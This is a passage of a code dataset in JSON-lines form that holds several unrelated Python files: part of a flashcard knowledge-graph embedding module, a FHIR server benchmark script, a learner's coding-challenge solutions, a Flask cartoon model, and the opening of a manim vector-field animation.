unique_abstraction_vals):\n avg_connection_vals_and_num_samples = np.array([get_avg_connection_strength_near_abstraction_value(node, abs_val) \n for abs_val in unique_abstraction_vals])\n avg_connection_vals = avg_connection_vals_and_num_samples[:,0]\n num_sample_cards = len(node.cards) * avg_connection_vals_and_num_samples[:,1]\n return avg_connection_vals, num_sample_cards\n\n node = self\n unique_abstraction_vals = sorted(list(set(node.neighbors_relative_abstraction.values())))\n avg_connection_vals, num_sample_cards = get_avg_connection_strength_vs_unique_abstractions(node, unique_abstraction_vals)\n # Note, num_sample_cards is the number of total cards involved in the averaging\n # so it's the number of words averaged together, times the number of cards in the node \n \n if len(unique_abstraction_vals) > 1:\n # get interpolations\n avg_connection_vals_interp = scipy.interpolate.interp1d(unique_abstraction_vals, avg_connection_vals, kind=\"linear\")\n num_sample_cards_interp = scipy.interpolate.interp1d(unique_abstraction_vals, num_sample_cards, kind=\"linear\")\n\n # Evaluate for all data points \n pred_val_dict = {_title: avg_connection_vals_interp(node.neighbors_relative_abstraction[_title]) \n for _title in node.neighbors}\n num_samples_dict = {_title: num_sample_cards_interp(node.neighbors_relative_abstraction[_title]) \n for _title in node.neighbors}\n else: # there is just one value\n pred_val_dict = {_title: avg_connection_vals[0] for _title in node.neighbors}\n num_samples_dict = {_title: num_sample_cards[0] for _title in node.neighbors}\n\n return pred_val_dict, num_samples_dict\n\n def _calculate_LCB_association_significance(self, con_str, con_str_num_cards, pred_con_str, \n pred_con_str_num_cards, lower_bound_epsilon=0.025):\n # Gets lower confidence bound for whether these concepts are significantly associated\n \n def get_beta_LCB(fraction_observed, n_measurements, lower_bound_epsilon):\n # beta.ppf is the inverse of the cdf distribution\n # it gives the value of the input to the beta distribution with these parameters where\n # the probability of fraction_observed being lower than this is lower_bound_epsilon\n\n prior_alpha = 1.0\n prior_beta = 1.0\n\n n_observed = fraction_observed * n_measurements\n lower_bound_value = scipy.stats.beta.ppf(lower_bound_epsilon, prior_alpha + n_observed, \n prior_beta + n_measurements - n_observed)\n\n return lower_bound_value\n\n def get_beta_cdf(test_value, n_measurements, pred_value):\n prior_alpha = 1.0\n prior_beta = 1.0\n\n pred_n_observed = pred_value * n_measurements\n cdf_probability = scipy.stats.beta.cdf(test_value, prior_alpha + pred_n_observed, \n prior_beta + n_measurements - pred_n_observed)\n return cdf_probability\n\n def get_probability_score(connection_strength, n_cards_for_connection, pred_connection_strength, \n n_cards_for_prediction, lower_bound_epsilon=0.025):\n lower_bound_value = get_beta_LCB(connection_strength, n_cards_for_connection, lower_bound_epsilon)\n cdf_probability = get_beta_cdf(lower_bound_value, n_cards_for_prediction, pred_connection_strength)\n return cdf_probability\n\n prob_score = get_probability_score(con_str, con_str_num_cards, pred_con_str, pred_con_str_num_cards, lower_bound_epsilon)\n return prob_score\n\n\n def update_significance_vector(self, abstraction_window_plus_minus_for_avg=1.51,\n lower_bound_epsilon=0.025):\n \"\"\"\n Gets a detailed metric for the connection strength from this node to others.\n This metric is based on the lower confidence bound for association strength.\n \n Returns a dictionary with this score\n Does not include self in dictionary. \n \"\"\"\n\n window_pm = abstraction_window_plus_minus_for_avg\n num_cards = len(self.cards) # number of cards touching this node \n predicted_con_str, num_sample_cards = self._get_predicted_connection_strength(window_pm)\n con_str = self.neighbors_connection_strength\n \n significance_vector = {_title: self._calculate_LCB_association_significance(con_str[_title], num_cards, \n predicted_con_str[_title], \n num_sample_cards[_title], \n lower_bound_epsilon)\n for _title in self.neighbors}\n \n self.significance_vector = significance_vector # update stored value\n self.sum_of_significances_from_node = np.sum(list(self.significance_vector.values()))\n \n return None\n \n def update_raw_embedding_vector(self, abstraction_window_plus_minus_for_avg=1.51,\n lower_bound_epsilon=0.025):\n self.update_significance_vector()\n \n # Now use significance vector and number of shared edges to associate concepts \n self.raw_embedding_vector = {k: v * self.significance_vector[k]\n for k, v in self.neighbors_connection_strength.items()}\n \n return self.raw_embedding_vector\n\nclass KnowledgeGraph:\n \"\"\"\n Will contain a dictionary of nodes of the graph, and a dictionary of cards in the graph which connect the nodes.\n \n Initialization process is create card, then add it to graph, then add to nodes, then update nodes based on card properties \n \"\"\"\n \n def __init__(\n self,\n lower_bound_epsilon=0.05, # the significance level for determining if nodes are associated \n ):\n self.nodes: Dict[str: Node ] = {} \n self.cards: Dict[int: Card ] = {} \n self.lower_bound_epsilon = lower_bound_epsilon\n \n self.node_embedding_num_maximum_passes_through_network = 100\n # Sets maximum number of times we'll loop through network when calculating node embedding\n self.node_embedding_update_fraction_condition_for_node_embedding_convergence = 0.01 \n # smaller threshold means slower convergence but more accuracy\n self.node_embedding_update_combination_power = 6 \n # higher power means change node embedding more slowly \n # This leads to slower convergence, but better averaging over nodes\n \n def _add_card(self, topic, question, answer, key_ideas, cardConceptHierarchy):\n # initialize card\n newCardID = 1 + max(list(self.cards.keys()) + [-1]) # get max value plus one \n card = Card(newCardID, topic, question, answer, key_ideas, cardConceptHierarchy)\n self.cards[newCardID] = card\n \n self._update_node_parameters_when_adding_card(card)\n \n node_titles_updated = set(card.concepts.get_concepts_list())\n return node_titles_updated\n \n def _update_node_parameters_when_adding_card(self, card):\n \"\"\"\n # Adds nodes if necessary.\n Updates \n node.cards set, \n node.neighbors set of nodes, \n node.neighbors_card_connections dictionary of cards to each node\n node.neighbors_connection_count dictionary of number of cards connecting to each node\n node.neighbors_connection_strength float of fraction of times mentioned together\n node.neighbors_reverse_connection_strength float of reverse connection (from neighbors perspective)\n \"\"\"\n \n node_titles_to_update = list(set(card.concepts.get_concepts_list())) # remove duplicates\n for node_title in node_titles_to_update: \n node = self.nodes.setdefault(node_title, Node(node_title)) # creates node it if not existing yet\n node.cards.add(card.cardID) # Update card set for this node to include current card\n neighbor_node_titles_to_update = [title for title in node_titles_to_update \n if title != node_title] # gather list of others only\n \n for n_node_title in neighbor_node_titles_to_update:\n node.neighbors.add(n_node_title)\n \n # Update card connection set. Have to add default in case we never connected before\n card_connections = node.neighbors_card_connections.setdefault(n_node_title, set())\n card_connections.add(card.cardID)\n node.neighbors_connection_count[n_node_title] = len(card_connections)\n \n # For connection strength, we have to iterate over all neighbors of the node\n for n_node_title in node.neighbors_card_connections.keys():\n connection_strength = float(node.neighbors_connection_count[n_node_title])/len(node.cards)\n node.neighbors_connection_strength[n_node_title] = connection_strength\n\n # Finally update the stored reverse connection strengths (it's not a symmetric metric)\n for node_title in node_titles_to_update: \n node = self.nodes[node_title]\n for n_node_title in node.neighbors:\n n_node = self.nodes[n_node_title]\n n_node_strength_to_node = n_node.neighbors_connection_strength[node_title]\n node.neighbors_reverse_connection_strength[n_node_title] = n_node_strength_to_node\n \n def _get_node_neighbor_rel_abstraction_over_card_list(self, cardIDList, concept1, concept2):\n # This method is in the knowledge graph because it requires information from cards\n relative_abstractions = [self.cards[_cardID].get_abstraction_from_1_to_2(concept1, concept2)\n for _cardID in cardIDList]\n return np.average(np.array(relative_abstractions))\n \n def _recalculate_relative_abstraction(self, node_titles_to_update, verbose=False):\n # Loop through updated nodes and recalculate relative abstraction \n start_time = time.time()\n for _ind, node_title in enumerate(node_titles_to_update): \n if verbose:\n if _ind % 200 == 0:\n print(' Node number: ', _ind, ', Title: \"{}\" at time '.format(node_title), \n np.round(time.time() - start_time,2))\n \n node = self.nodes[node_title]\n for n_node_title in node.neighbors:\n # Update relative abstraction \n card_connections = node.neighbors_card_connections[n_node_title]\n rel_abs = self._get_node_neighbor_rel_abstraction_over_card_list(card_connections, \n node_title, n_node_title)\n node.neighbors_relative_abstraction[n_node_title] = rel_abs\n \n def add_card_deck(self, card_deck, verbose=False):\n # card_deck is a list of card meta data for input to add_card\n \n # Add basic info of cards \n node_titles_updated = set()\n for card_data in card_deck:\n node_titles_updated_this_card = self._add_card(*card_data)\n node_titles_updated.update(node_titles_updated_this_card)\n \n # Loop through updated nodes and recalculate relative abstraction \n print(\"Recalculating relative abstraction\") if verbose else None\n self._recalculate_relative_abstraction(node_titles_updated, verbose=verbose)\n \n # Update raw embedding vector for these nodes\n print(\"Updating raw embedding vectors\") if verbose else None\n start_time = time.time()\n for _ind, node_title in enumerate(node_titles_updated):\n if verbose and _ind % 200 == 0:\n print(' Node number: ', _ind, ', Title: \"{}\" at time '.format(node_title), \n np.round(time.time() - start_time,2))\n self.nodes[node_title].update_raw_embedding_vector(lower_bound_epsilon=self.lower_bound_epsilon)\n \n # Update all counts of significances to each node. This should be fast, so do it over whole graph\n for node in self.nodes.values():\n node.sum_of_significances_to_node = 0.0 \n node.sum_of_raw_embeddings_to_node = 0.0 \n for k, v in node.significance_vector.items():\n node.sum_of_significances_to_node += v\n for k, v in node.raw_embedding_vector.items():\n node.sum_of_raw_embeddings_to_node += v\n \n return node_titles_updated\n \n def update_all_node_embeddings(self,\n allow_reusing_existing_node_embedding=True, # saves computation a ton\n verbose=False,\n ):\n \"\"\"\n Get embedding vectors from raw embeddings \n This effectively measures and builds the network connectivity based on global structure\n Final embedding to neighbor gets increased if neighbors share many mutual neighbors \n \"\"\"\n\n num_maximum_passes_through_network = self.node_embedding_num_maximum_passes_through_network\n update_fraction_condition_for_node_embedding_convergence = self.node_embedding_update_fraction_condition_for_node_embedding_convergence\n update_combination_power = self.node_embedding_update_combination_power\n\n # Use trimmed raw embedding vectors of other nodes for calculating overlap \n # This speeds up computation by 10x roughly\n raw_embedding_vectors_trimmed = {node_title: trim_embedding_vector(node.raw_embedding_vector)\n for node_title, node in self.nodes.items()}\n\n node_titles_and_sum_of_sigs = self.get_node_titles_and_sum_of_significances_to_node_decreasing_order()\n\n if verbose:\n print('Updating all node embeddings:')\n start_time = time.time()\n for _ind, (node_title, sum_of_sigs) in enumerate(node_titles_and_sum_of_sigs):\n if verbose:\n if _ind % 200 == 0 or time.time() - prev_time > 1.0:\n print(' Node number: ', _ind, ', Title: \"{}\" at time '.format(node_title), \n np.round(time.time() - start_time,2))\n prev_time = time.time()\n\n node = self.nodes[node_title]\n\n # Get order to loop through neighbors\n # Want to loop through by order of raw embedding in relation to this card, least embedding first. \n ordering_dict = node.raw_embedding_vector\n sort_inds = np.argsort(list(ordering_dict.values()))\n sorted_neighbor_names = np.array(list(ordering_dict.keys()))[sort_inds] \n\n # Initialize embedding vector \n if len(node.embedding_vector) > 0 and allow_reusing_existing_node_embedding:\n new_emb_vec = node.raw_embedding_vector.copy() # have to copy because we maybe introduced new elements \n new_emb_vec.update(node.embedding_vector.copy()) # uses old embedding vector as default values\n else:\n new_emb_vec = node.raw_embedding_vector.copy() # to be filled \n new_emb_vec_current_total = np.sum(list(new_emb_vec.values())) \n # Keep track of vector running sum rather than recalculating inner product (which is slow)\n\n # Loop through nodes and update embedding\n # need to do multiple passes over all nodes to converge to a new node representation. \n for pass_ind in range(num_maximum_passes_through_network): \n total_update_this_pass = 0.0 # keep track how much we have updated, to check convergence\n for n_node_title in sorted_neighbor_names: \n n_node_raw_emb_vec_trimmed = raw_embedding_vectors_trimmed[n_node_title]\n n_node_raw_emb_sum_to_n_node = self.nodes[n_node_title].sum_of_raw_embeddings_to_node \n\n # Calculate normalized overlap (this is like the new target embedding)\n overlap = min(1, emb_vec_inner_product(new_emb_vec, n_node_raw_emb_vec_trimmed) / \n new_emb_vec_current_total)\n # Want to rotate slowly to new overlap, so average strongly with previous value\n overlap_reduced = ((overlap * new_emb_vec[n_node_title] ** (update_combination_power - 1)) \n ** (1.0/ update_combination_power))\n updated_value = overlap_reduced / (1.0 + n_node_raw_emb_sum_to_n_node) \n # The denominator kills major concepts, since they're not very useful for embedding\n\n # Update parameters \n total_update_this_pass += np.abs(updated_value - new_emb_vec[n_node_title])\n new_emb_vec_current_total += updated_value - new_emb_vec[n_node_title]\n new_emb_vec[n_node_title] = updated_value\n\n # Check for convergence and break if done\n if ((total_update_this_pass / new_emb_vec_current_total) \n < update_fraction_condition_for_node_embedding_convergence):\n break \n\n node.embedding_vector = new_emb_vec\n node.embedding_vector_trimmed = trim_embedding_vector(new_emb_vec)\n \n # Update the sum of embeddings to each node\n for node in self.nodes.values():\n node.sum_of_embeddings_to_node = 0.0\n for k, v in node.embedding_vector.items():\n node.sum_of_embeddings_to_node += v\n \n def update_all_embeddings(self,\n allow_reusing_existing_node_embedding=True, # saves computation a ton\n verbose=False,\n ):\n \n # Update all nodes\n self.update_all_node_embeddings(allow_reusing_existing_node_embedding=allow_reusing_existing_node_embedding,\n verbose=verbose)\n \n # Update all cards \n for card in self.cards.values():\n card.update_embedding_vector(self)\n \n def get_node_titles_and_sum_of_significances_to_node_decreasing_order(self):\n node_titles_and_sum_of_significances_to_node = [(node.title, node.sum_of_significances_to_node) for node in self.nodes.values()] \n sum_of_significances_to_node = [node.sum_of_significances_to_node for node in self.nodes.values()] \n sum_of_significances_to_node_sorted_inds = np.flip(np.argsort(np.array(sum_of_significances_to_node)))\n sorted_node_titles_and_sum_of_significances_to_node = np.array(node_titles_and_sum_of_significances_to_node)[sum_of_significances_to_node_sorted_inds]\n return sorted_node_titles_and_sum_of_significances_to_node\n\n def get_dict_of_emb_vec_inner_product_over_nodes(self, emb_vec, useTrimmed=True):\n if useTrimmed:\n overlap_dict = {node_title: emb_vec_inner_product(emb_vec, node.embedding_vector_trimmed)\n for node_title, node in self.nodes.items()}\n else:\n overlap_dict = {node_title: emb_vec_inner_product(emb_vec, node.embedding_vector)\n for node_title, node in self.nodes.items()} \n return overlap_dict\n\n def get_dict_of_emb_vec_inner_product_over_cards(self, emb_vec, useTrimmed=True):\n if useTrimmed:\n overlap_dict = {cardID: emb_vec_inner_product(emb_vec, card.embedding_vector_trimmed)\n for cardID, card in self.cards.items()}\n else:\n overlap_dict = {cardID: emb_vec_inner_product(emb_vec, card.embedding_vector)\n for cardID, card in self.cards.items()}\n return overlap_dict\n \n def display_object_overlaps(self, input_object):\n # input_object should be a node or card\n\n if isinstance(input_object, Node):\n object_type = 'Node'\n object_title = input_object.title\n emb_vec = input_object.embedding_vector\n elif isinstance(input_object, Card):\n object_type = 'Card'\n object_title = input_object.topic + \" ID:\" + str(input_object.cardID)\n emb_vec = input_object.embedding_vector\n else:\n raise Exception(\"Trying to display an object that is not allowed\")\n\n overlap_dict_nodes = self.get_dict_of_emb_vec_inner_product_over_nodes(emb_vec)\n overlap_dict_cards = self.get_dict_of_emb_vec_inner_product_over_cards(emb_vec)\n\n sorted_node_titles, sorted_node_overlaps = get_dict_items_sorted_by_decreasing_value(overlap_dict_nodes)\n sorted_cardIDs, sorted_card_overlaps = get_dict_items_sorted_by_decreasing_value(overlap_dict_cards)\n\n def plot_overlaps_vs_names(xvals, yvals, xlabel, title, num_display):\n fig, ax = plt.subplots(1, figsize=(12, 2))\n ax.set_title(title)\n ax.scatter(xvals[0:num_display], yvals[0:num_display], marker = 'o', color = 'blue', s=4, label='')\n ax.set_xlabel(xlabel)\n ax.set_ylabel('Overlap')\n plt.xticks(rotation=85)\n plt.ylim([0,1.05*np.max(yvals[0:num_display])])\n plt.show()\n\n def plot_overlaps_histograms(node_overlaps, card_overlaps, title, num_bins=40):\n fig, ax = plt.subplots(1, 2, figsize=(8, 2))\n ax[0].hist(node_overlaps, bins=num_bins)\n ax[0].set_xlabel('Node overlap')\n ax[0].set_ylabel('Counts')\n ax[0].set_yscale('log')\n ax[1].hist(card_overlaps, bins=num_bins)\n ax[1].set_xlabel('Card overlap')\n ax[1].set_ylabel('Counts')\n ax[1].set_yscale('log')\n ax[0].set_title(title)\n plt.show()\n\n title = 'Histogram of overlaps for ' + object_type + ' \"'+ object_title + '\"'\n plot_overlaps_histograms(sorted_node_overlaps, sorted_card_overlaps, title)\n\n # Visualize the results\n num_display = 60\n xvals = sorted_node_titles\n yvals = sorted_node_overlaps\n xlabel = 'Neighbor node title'\n title = 'Node overlaps for ' + object_type + ' \"'+ object_title + '\"'\n plot_overlaps_vs_names(xvals, yvals, xlabel, title, num_display)\n\n # Visualize the results\n num_display = 60\n xvals = [self.cards[cardID].topic + ' ID:' + str(cardID) for cardID in sorted_cardIDs[0:num_display]]\n yvals = sorted_card_overlaps\n xlabel = 'Card topic and ID'\n title = 'Card overlaps for ' + object_type + ' \"'+ object_title + '\"'\n plot_overlaps_vs_names(xvals, yvals, xlabel, title, num_display)\n \n \ndef create_card_deck_from_dataframe_of_abstraction_groups(cards_df_abstraction_groups):\n card_deck = []\n \n # Add cards \n print('Adding {} cards'.format(len(cards_df_abstraction_groups)))\n for card_ind in range(len(cards_df_abstraction_groups)):\n abstraction_groups = cards_df_abstraction_groups['Abstraction groups'].values[card_ind] \n topic = abstraction_groups['0'][0] # Extracts abstraction level 0, then first element.\n question = cards_df_abstraction_groups[\"Question\"].values[card_ind]\n answer = cards_df_abstraction_groups[\"Answer\"].values[card_ind]\n key_ideas = cards_df_abstraction_groups[\"Key ideas\"].values[card_ind]\n \n # construct card concept heirarchy\n cardConceptHierarchy = CardConceptHierarchy(topic, \"\")\n concept_lists = []\n for k, v in abstraction_groups.items():\n if k != '0':\n concept_lists.append([list(v), int(k)])\n\n # Now make concept hierarchy \n for concept_list, level in concept_lists:\n for concept in concept_list:\n cardConceptHierarchy.set_concept(level, concept, \"\")\n \n card_deck.append([topic, question, answer, key_ideas, cardConceptHierarchy])\n \n return card_deck ","repo_name":"tomhartke/knowledge-graph-from-GPT","sub_path":"knowledge_graph.py","file_name":"knowledge_graph.py","file_ext":"py","file_size_in_byte":46314,"program_lang":"python","lang":"en","doc_type":"code","stars":515,"dataset":"github-code","pt":"82"} +{"seq_id":"34612503963","text":"from fhir_kindling import FhirServer\nfrom fhir_kindling.benchmark import ServerBenchmark\n\nDEFAULT_SERVERS = [\n {\"name\": \"blaze\", \"api_address\": \"http://localhost:9090/fhir\"},\n # {\"name\": \"hapi\", \"api_address\": \"http://localhost:9091/fhir\"},\n {\n \"name\": \"linux4h\",\n \"api_address\": \"http://localhost:9080/fhir-server/api/v4/\",\n \"credentials\": {\"username\": \"fhiruser\", \"password\": \"change-password\"},\n },\n]\n\n\ndef run_benchmark(servers=DEFAULT_SERVERS):\n \"\"\"Run a benchmark against the given servers.\"\"\"\n\n # initialize server objects\n benchmark_servers = []\n for s in servers:\n print(f\"initializing Server {s['name']} -- {s['api_address']}\")\n credentials = s.get(\"credentials\", None)\n if credentials:\n benchmark_servers.append(\n FhirServer(\n api_address=s[\"api_address\"],\n **credentials,\n )\n )\n else:\n benchmark_servers.append(FhirServer(api_address=s[\"api_address\"]))\n\n print(f\"Running benchmark for {len(benchmark_servers)} servers\")\n\n benchmark = ServerBenchmark(\n servers=benchmark_servers,\n server_names=[s[\"name\"] for s in servers],\n dataset_size=10,\n n_attempts=2,\n )\n benchmark.run_suite()\n\n\nif __name__ == \"__main__\":\n run_benchmark()\n","repo_name":"migraf/fhir-kindling","sub_path":"benchmarks/benchmark_servers.py","file_name":"benchmark_servers.py","file_ext":"py","file_size_in_byte":1357,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"82"} +{"seq_id":"38939382246","text":"# Codewriting\n# Task 1 of 4\n# Given an integer n and an array a of length n, your task is to apply the following mutation to a:\n\n# Array a mutates into a new array b of length n.\n# For each i from 0 to n - 1, b[i] = a[i - 1] + a[i] + a[i + 1].\n# If some element in the sum a[i - 1] + a[i] + a[i + 1] does not exist, it should be set to 0. For example, b[0] should be equal to 0 + a[0] + a[1].\n# Example\n# For n = 5 and a = [4, 0, 1, -2, 3], the output should be solution(n, a) = [4, 5, -1, 2, 1].\n\n# b[0] = 0 + a[0] + a[1] = 0 + 4 + 0 = 4\n# b[1] = a[0] + a[1] + a[2] = 4 + 0 + 1 = 5\n# b[2] = a[1] + a[2] + a[3] = 0 + 1 + (-2) = -1\n# b[3] = a[2] + a[3] + a[4] = 1 + (-2) + 3 = 2\n# b[4] = a[3] + a[4] + 0 = (-2) + 3 + 0 = 1\n# So, the resulting array after the mutation will be [4, 5, -1, 2, 1].\n\n# Input/Output\n\n# [execution time limit] 4 seconds (js)\n\n# [input] integer n\n\n# An integer representing the length of the given array.\n\n# Guaranteed constraints:\n# 1 ≤ n ≤ 103.\n\n# [input] array.integer a\n\n# An array of integers that needs to be mutated.\n\n# Guaranteed constraints:\n# a.length = n,\n# -103 ≤ a[i] ≤ 103.\n\n# [output] array.integer\n\n# The resulting array after the mutation.\n\n\ndef mutate(n, a):\n '''Mutate a sequence of integers'''\n new_arr = []\n for i in range(n):\n if i == 0:\n new_arr.append(a[i] + a[i + 1])\n elif i >= n - 1:\n new_arr.append(a[i - 1] + a[i])\n else:\n new_arr.append(a[i - 1] + a[i] + a[i + 1])\n\n return new_arr\n\n\nlst = [4, 0, 1, -2, 3]\nprint(mutate(len(lst), lst))\n\n# Task 2 of 4\n# Given two strings s and t, both consisting of lowercase English letters and digits, your task is to calculate how many ways exactly one digit could be removed from one of the strings so that s is lexicographically smaller than t after the removal. Note that we are removing only a single instance of a single digit, rather than all instances (eg: removing 1 from the string a11b1c could result in a1b1c or a11bc, but not abc).\n\n# Also note that digits are considered lexicographically smaller than letters.\n\n# Example\n\n# For s = \"ab12c\" and t = \"1zz456\", the output should be solution(s, t) = 1.\n\n# Here are all the possible removals:\n\n# We can remove the first digit from s, obtaining \"ab2c\". \"ab2c\" > \"1zz456\", so we don't count this removal\n# We can remove the second digit from s, obtaining \"ab1c\". \"ab1c\" > \"1zz456\", so we don't count this removal\n# We can remove the first digit from t, obtaining \"zz456\". \"ab12c\" < \"zz456\", so we count this removal\n# We can remove the second digit from t, obtaining \"1zz56\". \"ab12c\" > \"1zz56\", so we don't count this removal\n# We can remove the third digit from t, obtaining \"1zz46\". \"ab12c\" > \"1zz46\", so we don't count this removal\n# We can remove the fourth digit from t, obtaining \"1zz45\". \"ab12c\" > \"1zz45\", so we don't count this removal\n# The only valid case where s < t after removing a digit is \"ab12c\" < \"zz456\". Therefore, the answer is 1.\n\n# For s = \"ab12c\" and t = \"ab24z\", the output should be solution(s, t) = 3.\n\n# There are 4 possible ways of removing the digit:\n\n# \"ab1c\" < \"ab24z\"\n# \"ab2c\" > \"ab24z\"\n# \"ab12c\" < \"ab4z\"\n# \"ab12c\" < \"ab2z\"\n# Three of these cases match the requirement that s < t, so the answer is 3.\n\n# Input/Output\n\n# [execution time limit] 4 seconds (js)\n\n# [input] string s\n\n# A string consisting of lowercase English letters and digits 0..9.\n\n# Guaranteed constraints:\n# 1 ≤ s.length ≤ 103.\n\n# [input] string t\n\n# A string consisting of lowercase English letters and digits 0..9.\n\n# Guaranteed constraints:\n# 1 ≤ t.length ≤ 103.\n\n# [output] integer\n\n# The number of ways to remove exactly one digit from one of the strings so that s is lexicographically smaller than t after the removal.\n\n\ndef lexicotract(s, t):\n \"\"\"calculate how many ways exactly one digit could be removed from one of the strings \n so that s is lexicographically smaller than t after the removal\"\"\"\n count, lst_s, lst_t = 0, list(s), list(t)\n for i, num in enumerate(s):\n if 48 <= ord(num) <= 57:\n lst_s.remove(num)\n count += (''.join(lst_s) < t)\n lst_s.insert(i, num)\n for i, num in enumerate(t):\n if 48 <= ord(num) <= 57:\n lst_t.remove(num)\n count += (''.join(lst_t) > s)\n lst_t.insert(i, num)\n return count\n\n\nprint(lexicotract('ab12c', 'ab24z'))\n\n# Task 4 of 4\n# Given an array of integers a of even length, your task is to split it into \n# two arrays of equal length such that all the numbers are unique in each of them.\n\n# There may be more than one possible answer, in which case you may return any of them. \n# If there are no possible answers, return an empty array.\n\n# Hint: Count the number of occurrences of each integer in a. \n# If there are integers occurring more than twice, then there is no solution. \n# Next, put the integers occurring twice into both answer arrays. \n# Finally, put all other numbers in the answer arrays, following the condition \n# that they should have equal sizes.\n\n# Example\n\n# For a = [2, 1, 2, 3, 3, 4], the output can be solution(a) = [[2, 1, 3], [2, 3, 4]].\n\n# Answers like [[1, 2, 3], [2, 3, 4]] or [[4, 2, 3], [3, 2, 1]] would also be considered correct.\n\n# For a = [1, 2, 2, 1], the output can be solution(a) = [[1, 2], [2, 1]].\n\n# Again, there are other possible answers.\n\n# For a = [2, 2, 3, 3, 2, 2], the output should be solution(a) = [].\n\n# No matter how we try to split this array, there will be at least two 2s in at \n# least one of the resulting arrays. So the answer is [].\n\n# Input/Output\n\n# [execution time limit] 4 seconds (js)\n\n# [input] array.integer a\n\n# An array of integers. It is guaranteed that a has even length.\n\n# Guaranteed constraints:\n# 2 ≤ a.length ≤ 104,\n# 1 ≤ a[i] ≤ 105.\n\n# [output] array.array.integer\n\n# Return an empty array if there is no solution. If a solution exists, \n# return an array of two arrays - a distribution of a where each of these two arrays are of equal length\n# and each contains unique elements.\n\n\ndef unique_splt(*nums):\n \"\"\"Split an array of numbers into two arrays of the same length containing unique elements\"\"\"\n solution = [[], []]\n for num in nums:\n if num not in solution[0] and len(solution[0]) < len(nums) / 2:\n solution[0].append(num)\n elif num not in solution[1] and len(solution[1]) < len(nums) / 2:\n solution[1].append(num)\n else:\n return []\n return solution\n\n\nprint(unique_splt(2, 2, 3, 3, 2, 2))\n\n\n########################################################################\n########################################################################\n# matriix = [[1, 2, 3],\n# [4, 5, 6],\n# [7, 8, 9]]\n\n\n# def solution(a):\n# \"\"\" Rotate a 2 dimensional array of numbers by 90 degrees clockwise \"\"\"\n# a.reverse()\n# for i in range(len(a)):\n# for j in range(i):\n# a[i][j], a[j][i] = a[j][i], a[i][j]\n\n# print(a)\n\n\n# solution(matriix)\n\n\ngrid = [['.', '.', '.', '.', '2', '.', '.', '9', '.'],\n ['.', '.', '.', '.', '6', '.', '.', '.', '.'],\n ['7', '1', '.', '.', '7', '5', '.', '.', '.'],\n ['.', '7', '.', '.', '.', '.', '.', '.', '.'],\n ['.', '.', '.', '.', '8', '3', '.', '.', '.'],\n ['.', '.', '8', '.', '.', '7', '.', '6', '.'],\n ['.', '.', '.', '.', '.', '2', '.', '.', '.'],\n ['.', '1', '.', '2', '.', '.', '.', '.', '.'],\n ['.', '2', '.', '.', '3', '.', '.', '.', '.']]\n\n\ndef solution(grid):\n for i, list_of_nums in enumerate(grid):\n for j, num in enumerate(list_of_nums):\n if ord(num) > 46 and list_of_nums.count(num) > 1:\n print(num)\n\n\nprint(solution(grid))\n","repo_name":"adelaykay/semester4-python","sub_path":"challenges.py","file_name":"challenges.py","file_ext":"py","file_size_in_byte":7712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"6560255832","text":"# -*- coding: utf-8 -*-\n# @Author: Nianko \n# @Date: 2018-03-14T15:02:16+08:00\n# @Last modified by: nianko\n# @Last modified time: 2018-03-15T10:41:57+08:00\n\nfrom app import db\n\nclass Cartoon(db.Model):\n __tablename__ = 'cartoon'\n __table_args__ = {\n \"mysql_engine\": \"InnoDB\", # 指定表的引擎,InnoDB(MySQL的数据库引擎之一)\n \"mysql_charset\": \"utf8\" # 指定表的编码格式\n }\n id = db.Column(db.Integer, primary_key=True) #int 类型\n name = db.Column(db.String(225), nullable=False) #string类型\n intro = db.Column(db.Text) #文本类型\n pub_date = db.Column(db.String(225))\n icon = db.Column(db.String(250))\n video_url = db.Column(db.String(250))\n count = db.Column(db.Integer, default=0)\n created_at = db.Column(db.String(225))\n status = db.Column(db.Integer, default=1) #1 正常 0 禁止播放 -1 不显示\n\n #repr()方法显示一个可读字符串,虽然不是完全必要,不过用于调试和测试还是很不错的。\n def __repr__(self):\n return '' % self.id\n","repo_name":"Miaoza/FlaskRestful-SqlAlchemy","sub_path":"app/cartoon/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"82"} +{"seq_id":"70083453710","text":"from manimlib.imports import *\n\nclass VectorFields(ThreeDScene):\n\n CONFIG = {\n \"axes_config\": {\n \"x_min\": -4,\n \"x_max\": 4,\n \"y_min\": -4,\n \"y_max\": 4,\n \"z_min\": -3,\n \"z_max\": 3,\n \"a\":-4 ,\"b\": 4, \"c\":-4 , \"d\":4,\n \"axes_shift\": ORIGIN+2*LEFT,\n \"x_axis_config\": {\n \"tick_frequency\": 1,\n # \"include_tip\": False,\n },\n \"y_axis_config\": {\n \"tick_frequency\": 1,\n # \"include_tip\": False,\n },\n \"z_axis_config\": {\n \"tick_frequency\": 1,\n # \"include_tip\": False,\n },\n \"num_axis_pieces\": 10,\n },\n \"default_graph_style\": {\n \"stroke_width\": 2,\n \"stroke_color\": WHITE,\n },\n \"default_vector_field_config\": {\n \"delta_x\": .5,\n \"delta_y\": .5,\n \"x_min\": -3,\n \"x_max\": 3, \n \"y_min\": -3,\n \"y_max\": 3,\n \"min_magnitude\": 0,\n \"max_magnitude\": 4,\n \"colors\": [BLUE,GREEN,ORANGE,RED],\n \"length_func\": lambda norm : .45*sigmoid(norm),\n \"opacity\": 1.0,\n \"vector_config\": {\n \"stroke_width\":3.5,\n \"max_tip_length_to_length_ratio\": 0.35,\n \"max_stroke_width_to_length_ratio\": 8,\n },\n },\n \n }\n\n\n def construct(self):\n\n self.setup_axes()\n axes=self.axes\n \n self.set_camera_orientation(distance=35,\n phi=0 * DEGREES,\n theta=-90 * DEGREES,\n )\n self.move_camera(frame_center=axes.c2p(0,0,0))\n \n self.show_2d_field()\n self.wait(3)\n \n self.show_3d_field()\n self.begin_ambient_camera_rotation(rate=-.3,)\n self.wait(1.5)\n axes.x_axis.rotate(\n -90 * DEGREES, LEFT,\n about_point=axes.c2p(0, 0, 0),\n ),\n axes.y_axis.rotate(\n 90 * DEGREES, UP,\n about_point=axes.c2p(0, 0, 0),\n ),\n self.move_camera(\n # distance=20,\n phi=85 * DEGREES,\n rate_func=linear,\n run_time=8\n )\n self.wait(5)\n \n \n def show_2d_field(self): \n d2_field_text=TexMobject(\n r\"\\vec F(x,y)=-y\\hat i+x\\hat j\",\n stroke_width=1.5\n 